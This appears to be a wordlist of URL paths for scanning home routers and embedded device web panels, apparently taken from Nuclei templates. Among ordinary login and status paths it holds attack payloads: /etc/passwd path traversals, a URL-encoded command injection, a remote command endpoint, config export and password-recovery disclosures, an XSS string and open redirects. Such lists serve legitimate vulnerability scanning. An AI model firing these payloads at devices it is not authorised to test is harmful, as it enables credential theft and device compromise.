/dumpmdm.cmd
/getcfg.php
/wan.htm
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/cgi-bin/export-cgi?category=config&arg0=startup-config.conf
/rootDesc.xml
/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/wlsecurity.html
/login/../../../etc/passwd
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/passwordrecovered.cgi?id={{rand_base(5)}}
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/../../../../../../../../../../../../etc/passwd
/action/usermanager.htm
/cgi-bin/config.exp
/api-third-party/download/extdisks../etc/passwd
/index.asp
/apply.cgi
/cgi-bin/ExportLogs.sh
/api/sys/set_passwd
/lang/log/httpd.log
/api/sys/login
/password.cgi
/passwordrecovered.cgi?id=nuclei
/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
/wifi_base.shtml
/htmlcode/html/indexdefault.asp
/Main_Login.asp
/status.php
/login.htm
/login.sh
/cgi-bin/luci/
/login.html
/sess-bin/login_session.cgi
/currentsetting.htm
/login
/graphs/
/_syslog.txt
/messages
/loginLess/../../etc/passwd
/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1
/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1
